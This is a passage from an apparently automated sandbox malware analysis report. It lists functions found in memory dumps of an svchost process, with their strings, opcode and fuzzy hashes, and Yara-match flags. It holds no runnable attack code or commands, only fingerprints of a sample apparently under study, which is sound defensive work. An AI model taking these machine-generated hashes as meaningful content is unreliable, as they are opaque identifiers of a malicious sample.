                                                                                            • Instruction ID: 32431d5cc2a7f355dff79ad443be9cb31ff9457863e162745fd04e236378f6ce
                                                                                            • Opcode Fuzzy Hash: 8217e44685d9c5d6e2ad1512c87eab52bda18691300166ef326b118a7a8603a2
                                                                                            • Instruction Fuzzy Hash: 2731F87AA00200BBDB30DB58CA45F7ABABCFB55758F04066FE505AB680E774AD048790
                                                                                            Function 03A71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03A7127B
                                                                                            • BuildLabEx, xrefs: 03A7130F
                                                                                            • @, xrefs: 03A712A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                            • API String ID: 0-3051831665
                                                                                            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                            • Instruction ID: a8b8bbb8635f4c2b3293b378a0f0205e4696ba5b75bacd31a1d16628ac6f4bac
                                                                                            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                            • Instruction Fuzzy Hash: D6316F76A00619AFDB11EF95CD84EAFBBBDEB84750F004427E914AB260D730DA058B90
                                                                                            Function 03AB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 03AB20F3
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 03AB2104
                                                                                            • LdrpInitializationFailure, xrefs: 03AB20FA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-2986994758
                                                                                            • Opcode ID: 06262e8dba9930775aae76ff1c29c3f593c69b0380f494ab1d12a34f2db43fab
                                                                                            • Instruction ID: aef50762d6a564b8665e7659e57b1d488da50fa94125045cb761eaa95823ce30
                                                                                            • Opcode Fuzzy Hash: 06262e8dba9930775aae76ff1c29c3f593c69b0380f494ab1d12a34f2db43fab
                                                                                            • Instruction Fuzzy Hash: C9F02835640308BFD720E70CDD42FD9776CEB40B48F04086BF6006B682D2F0E510CA50
                                                                                            Function 03A403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: #%u
                                                                                            • API String ID: 48624451-232158463
                                                                                            • Opcode ID: f6216e98892603d10145e9ee0fb0afc33c6f6f31a2a1673eac4546dfa14edfb0
                                                                                            • Instruction ID: 8f770352b08b0b1f9371c788241d3551c7c65bfafa368bf9bbee186269fbe6fe
                                                                                            • Opcode Fuzzy Hash: f6216e98892603d10145e9ee0fb0afc33c6f6f31a2a1673eac4546dfa14edfb0
                                                                                            • Instruction Fuzzy Hash: C3715A75A002499FDF01DFA9DA94BAEB7F8AF48304F15416AE901AB351EB34ED01CB60
                                                                                            Function 03AD705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: kLsE
                                                                                            • API String ID: 3446177414-3058123920
                                                                                            • Opcode ID: d396464b4d63fe9ccc76103b2cf373d68c36f1bd0b1cbb310f7dd4af0edb010b
                                                                                            • Instruction ID: 855d1f489da0e14072bb88a84c01dc8d93171f355f2b0ef998dc5bc328983198
                                                                                            • Opcode Fuzzy Hash: d396464b4d63fe9ccc76103b2cf373d68c36f1bd0b1cbb310f7dd4af0edb010b
                                                                                            • Instruction Fuzzy Hash: 494153325013504AE335FF65EA84BA97BA4AB10B2CF18032EFDA18F6D9CBB54481C791
                                                                                            Function 03A452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@
                                                                                            • API String ID: 0-149943524
                                                                                            • Opcode ID: 0e9d468387df5cb8c219825662c0e4d5ec99b6754e20cc715079c1a7964f4e25
                                                                                            • Instruction ID: ad7057c915d896e68f9593e13577b879d61b08ddc5b21a22d9523fd04d0f494e
                                                                                            • Opcode Fuzzy Hash: 0e9d468387df5cb8c219825662c0e4d5ec99b6754e20cc715079c1a7964f4e25
                                                                                            • Instruction Fuzzy Hash: 113277749083118BDB28CF19C594B3AF7E5AFCA750F18492FF9959B2A0E734D844CB92
                                                                                            Function 03AFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `$`
                                                                                            • API String ID: 0-197956300
                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                            • Instruction ID: 43f70fa5d34d56a64a5fcdc68060a6d8f791d41cfd8d07da9d1eb43c14c6e85b
                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                            • Instruction Fuzzy Hash: F6C1CE312047429FD724CF68C944BABFBE5AF84358F088A2EF699CA290D779D505CF51
                                                                                            Function 03A30CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Failed to retrieve service checksum., xrefs: 03A8EE56
                                                                                            • ResIdCount less than 2., xrefs: 03A8EEC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                            • API String ID: 0-863616075
                                                                                            • Opcode ID: 4f997e090ffd5d28ca1235c0970a6b977c46f335d724c16239e74e0096c82c8a
                                                                                            • Instruction ID: eae62c7f7d0e92526fcc9591efc1be43e2ac25469e405032f68f141408973b1c
                                                                                            • Opcode Fuzzy Hash: 4f997e090ffd5d28ca1235c0970a6b977c46f335d724c16239e74e0096c82c8a
                                                                                            • Instruction Fuzzy Hash: 49E1E1B19087849FE324CF15C441BABBBE4BB88314F008A2FE59D8B381DB749509CF56
                                                                                            Function 00402620 Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d$gfff
                                                                                            • API String ID: 0-1799034191
                                                                                            • Opcode ID: 7c7e3d19d4338b95fbd49e97f60348eea0abdb1dce3251b4e656174b836c1395
                                                                                            • Instruction ID: 6acde87ad6c99a728100d2cab21e4da7bca42db48d8945b2d20613de315a308f
                                                                                            • Opcode Fuzzy Hash: 7c7e3d19d4338b95fbd49e97f60348eea0abdb1dce3251b4e656174b836c1395
                                                                                            • Instruction Fuzzy Hash: 27610536B0010647CF1CCA5DCE5466AB3A6EBD4314F24827FD815EB3C1E6B9DD028688
                                                                                            Function 03AAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: Legacy$UEFI
                                                                                            • API String ID: 2994545307-634100481
                                                                                            • Opcode ID: 1a506d39b7540ce06c88a39ab856b30e8fb7da990d5bcbe32583788bd8558ac1
                                                                                            • Instruction ID: fe63cef0f58181a8f0ad6ca9a193e05bfccce0e5103537f7dbb1726626a0688d
                                                                                            • Opcode Fuzzy Hash: 1a506d39b7540ce06c88a39ab856b30e8fb7da990d5bcbe32583788bd8558ac1
                                                                                            • Instruction Fuzzy Hash: 83611972E007189FDB25DFA9C980FAEBBB9FB48700F14446EE559EB291D731A940CB50
                                                                                            Function 03A4F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$$
                                                                                            • API String ID: 0-233714265
                                                                                            • Opcode ID: a1fe3c16f599b8381f6ccc23971672a75f23e53490f6ca8700c33fcf0be63e86
                                                                                            • Instruction ID: 14f5573c7da737d43996675d3e16fe1be76eff62064721f2db823f9f97dab2d7
                                                                                            • Opcode Fuzzy Hash: a1fe3c16f599b8381f6ccc23971672a75f23e53490f6ca8700c33fcf0be63e86
                                                                                            • Instruction Fuzzy Hash: E0619875A00749DFDB20EFA4C684BA9B7B1BB88308F18516FE515AF780CB74A941CB90
                                                                                            Function 03A3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 03A3A2FB
                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 03A3A309
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                            • API String ID: 0-2876891731
                                                                                            • Opcode ID: 02ee62e46804497b8d13d3a3048ea6584d4c8ceea016cb47bb799c774bdc231a
                                                                                            • Instruction ID: 1e984b6ce8cfbe99f09a20eeb728b9390f0b5f5433304e694890da2cf546d44e
                                                                                            • Opcode Fuzzy Hash: 02ee62e46804497b8d13d3a3048ea6584d4c8ceea016cb47bb799c774bdc231a
                                                                                            • Instruction Fuzzy Hash: 02418E39A04659DBDB11CF69C840B69B7F4EF86700F1844ABEC44EB391E335D940CB51
                                                                                            Function 03A6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .Local\$@
                                                                                            • API String ID: 0-380025441
                                                                                            • Opcode ID: 9a22b1a30ad11d13977a82771cefdcac3516183899cfe55b4bfce71a5dea755a
                                                                                            • Instruction ID: 217f52c9be5798c8a8e774fec2ba42c26763eceef0c792221df439a303396b1d
                                                                                            • Opcode Fuzzy Hash: 9a22b1a30ad11d13977a82771cefdcac3516183899cfe55b4bfce71a5dea755a
                                                                                            • Instruction Fuzzy Hash: 8031A17A5093049FCB10DF28C984A5BBBF8EBC5654F48092FF595872A0DA30DD05CB92
                                                                                            Function 03A3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: MUI
                                                                                            • API String ID: 0-1339004836
                                                                                            • Opcode ID: 44d76195c4876e8ff4a0f178b4e1b78bf05fcfa76dc9d232f9324d2f07a5f57c
                                                                                            • Instruction ID: 677922b58dce1b654552457bfd1fe1c2554a5188b2ce59053ef5459f6cdb6860
                                                                                            • Opcode Fuzzy Hash: 44d76195c4876e8ff4a0f178b4e1b78bf05fcfa76dc9d232f9324d2f07a5f57c
                                                                                            • Instruction Fuzzy Hash: E8822775E00218DFDB24CFA9C984BADF7B5BF4A710F18816AE859AB394D7309D81CB50
                                                                                            Function 03A82F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: P`vRbv
                                                                                            • API String ID: 0-2392986850
                                                                                            • Opcode ID: 7342cf4e4d69a3c314e8478ead086bb63926f2ddf7b25e900121087bda6b88eb
                                                                                            • Instruction ID: 614cf0fe81c0d5ac59cda9ef0b1b4f7ab7f7f86c7e6bb9ac2e62ff2701397f9d
                                                                                            • Opcode Fuzzy Hash: 7342cf4e4d69a3c314e8478ead086bb63926f2ddf7b25e900121087bda6b88eb
                                                                                            • Instruction Fuzzy Hash: 6142BE7DD04259AEDF29EFA8D8446BDFBB5AF05B10F18806FE441AB2D0D7748A81CB50
                                                                                            Function 03A37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4039f69f10575893d65e3dc404952f422e97782aae68f6ee03906d4fdabe63df
                                                                                            • Instruction ID: eb0fd9238ef9833a818ff9a74a081080f367bfb7fa71a8f3f298ece9abdc4357
                                                                                            • Opcode Fuzzy Hash: 4039f69f10575893d65e3dc404952f422e97782aae68f6ee03906d4fdabe63df
                                                                                            • Instruction Fuzzy Hash: F5A169B5608342CFD724DF28D580A2ABBF9BF89304F1449AEF5859B350E731E945CB92
                                                                                            Function 03A52E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0
                                                                                            • API String ID: 0-4108050209
                                                                                            • Opcode ID: ea6a1f2d78cb6b16bfaac3eaf6362bd3fa6de8b55da691206a3c8f4ffb99020b
                                                                                            • Instruction ID: fe18fdf758ddbb705bb336e58ff3e2fe2c24488414bd99d2642f4bbddba1e867
                                                                                            • Opcode Fuzzy Hash: ea6a1f2d78cb6b16bfaac3eaf6362bd3fa6de8b55da691206a3c8f4ffb99020b
                                                                                            • Instruction Fuzzy Hash: 2DF18E796087458FDF25CF25C580B6ABBE5AFC8650F09486FFC8A9B380DB30D9498B51
                                                                                            Function 004168D3 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (
                                                                                            • API String ID: 0-3887548279
                                                                                            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                            • Instruction ID: 909e4fd7064320abce83f4abc93d9c6d057b2f37113d79d8bb154cac043e28a7
                                                                                            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                            • Instruction Fuzzy Hash: 15021EB6E006189FDB14CF9AD4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                                                            Function 03A32FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PATH
                                                                                            • API String ID: 0-1036084923
                                                                                            • Opcode ID: 4e3a4d1c5f9cbe381c82728a7e0f2c0eb21af93acef93ad5a4ecd2da6f770ae8
                                                                                            • Instruction ID: 2a963f764ed2de4f2c4e31656ad1c2685209a33c935d619a4681d83f28ec82f4
                                                                                            • Opcode Fuzzy Hash: 4e3a4d1c5f9cbe381c82728a7e0f2c0eb21af93acef93ad5a4ecd2da6f770ae8
                                                                                            • Instruction Fuzzy Hash: 61F1C079D04218DBCF25DF98D981ABEB7B5FF89700F48812AF445AB390D774A841CB61
                                                                                            Function 03A6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c11fbf2f04bcbd650e43de2c28a217049f454bce5c912b115dc58a59ef5184f2
                                                                                            • Instruction ID: 1112202be1040bd41c8c32b9f50e9226aa79b4f364d7c1dbbbf504b3a5290133
                                                                                            • Opcode Fuzzy Hash: c11fbf2f04bcbd650e43de2c28a217049f454bce5c912b115dc58a59ef5184f2
                                                                                            • Instruction Fuzzy Hash: FC414978900288AFDB21DFA9D980AAEFBF4FB48304F14416FE859AB211D7359940CB60
                                                                                            Function 03A30100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 63ca541a1368ad5a10f12aad4cc11ffa9751dcd655141c78a12ee341f202856f
                                                                                            • Instruction ID: 25bf37e931ab92400de16b3e3626f1a6e61acdee3cccd67151376574a9a3b495
                                                                                            • Opcode Fuzzy Hash: 63ca541a1368ad5a10f12aad4cc11ffa9751dcd655141c78a12ee341f202856f
                                                                                            • Instruction Fuzzy Hash: F1A10931A08368ABDF28DB698945FFEA7B95F56304F0840DFFD87AB281D6748940CB51
                                                                                            Function 03A3973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                            • Instruction ID: b2f80c38dc2a053429c2eaf52d74e07b08113aa363a6d3dd09591dff4710f7eb
                                                                                            • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                            • Instruction Fuzzy Hash: 35613C75D00219ABDF21DF99C944BAEFBB8EF85714F14456FE810B7290D7B49901CBA0
                                                                                            Function 03ABF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                            • Instruction ID: 0bc704624d42cc68630cbf413135b15625f66575521c2b6838c1d7963715d6c7
                                                                                            • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                            • Instruction Fuzzy Hash: B2516772604345AFD721DF54CD84FAAB7BCFB84750F08092EB9809B291D7B4E914CB92
                                                                                            Function 03A4E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: EXT-
                                                                                            • API String ID: 0-1948896318
                                                                                            • Opcode ID: dd1e64b0bdbc65991748bf84c1470d96717c51955ce0b4e3d6828c137c6d9511
                                                                                            • Instruction ID: 469494d91b8942fadfeca3192ff490e22da4dfd56dcddbf3d0df3d4728d76353
                                                                                            • Opcode Fuzzy Hash: dd1e64b0bdbc65991748bf84c1470d96717c51955ce0b4e3d6828c137c6d9511
                                                                                            • Instruction Fuzzy Hash: 3D416D76608341ABD710DB65CA80F6BB7E8BFC9724F44092FB984EB280E674D9048796
                                                                                            Function 03AEB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PreferredUILanguages
                                                                                            • API String ID: 0-1884656846
                                                                                            • Opcode ID: 2556ef0672e753ccffc4b7cf8c44fc8c993c910e7ab7d911800da4347d9c5d89
                                                                                            • Instruction ID: 0bf2ffc12b98ea59b1c9a5dbb3f6a22a7917a72c214b63e55c37e390f6d1f0f8
                                                                                            • Opcode Fuzzy Hash: 2556ef0672e753ccffc4b7cf8c44fc8c993c910e7ab7d911800da4347d9c5d89
                                                                                            • Instruction Fuzzy Hash: 3141D23AD0421AAFCB11EB98C985BEEF7B9AF44710F05016BE911EB654D6B4DE40C7B0
                                                                                            Function 03AAC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: BinaryHash
                                                                                            • API String ID: 0-2202222882
                                                                                            • Opcode ID: abe4058df69b856430270bada14a2d75a6d8ac7dff8aa5fa94c197893163fb33
                                                                                            • Instruction ID: 9531dd9262fbd81c8677462acfe21dd1a65f00fb9eb8e8af66692a30cc91a83c
                                                                                            • Opcode Fuzzy Hash: abe4058df69b856430270bada14a2d75a6d8ac7dff8aa5fa94c197893163fb33
                                                                                            • Instruction Fuzzy Hash: 544137B6D0062CABEB21DB54CD84FDEB77CAB45714F0045E6E608EB240DB709E498FA4
                                                                                            Function 03AB97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: verifier.dll
                                                                                            • API String ID: 0-3265496382
                                                                                            • Opcode ID: 24034735ebe17cb15f3a5bdfffd5d6163d59c277c7efbb4d89e2fbaad08f38a7
                                                                                            • Instruction ID: 093dab7a00b60d91d4aad08fa41093c583ed1f2176691f80fd282057efe6ef59
                                                                                            • Opcode Fuzzy Hash: 24034735ebe17cb15f3a5bdfffd5d6163d59c277c7efbb4d89e2fbaad08f38a7
                                                                                            • Instruction Fuzzy Hash: 22318275A003019FDB34DFA99950AB7B6F9EB59314F58807FE6089F382E7318C818790
                                                                                            Function 03A636EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Flst
                                                                                            • API String ID: 0-2374792617
                                                                                            • Opcode ID: 3f56cbfd95e3ee63dd52777c446f134a5ec60beed2a824023dd63a219ba3397a
                                                                                            • Instruction ID: ad910cae8ffb72d45c5c2f007937f99f5e71966715f942a1f1eaffa9f46bdbb5
                                                                                            • Opcode Fuzzy Hash: 3f56cbfd95e3ee63dd52777c446f134a5ec60beed2a824023dd63a219ba3397a
                                                                                            • Instruction Fuzzy Hash: 334189B5605301DFCB14CF18C580A26FBE4EF8A710F1885AFE45A8F291DB71D942CB91
                                                                                            Function 03A35096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
